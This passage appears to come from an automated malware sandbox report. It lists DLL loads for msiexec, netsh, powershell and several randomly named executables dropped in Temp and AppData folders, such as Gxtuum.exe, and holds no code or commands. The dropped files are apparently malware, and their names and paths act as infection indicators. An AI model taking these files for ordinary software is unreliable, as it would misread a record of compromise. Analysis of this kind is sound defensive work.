                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: libffi-7.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: mstask.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: dui70.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: duser.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: chartv.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: oleacc.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: atlthunk.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: winsta.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
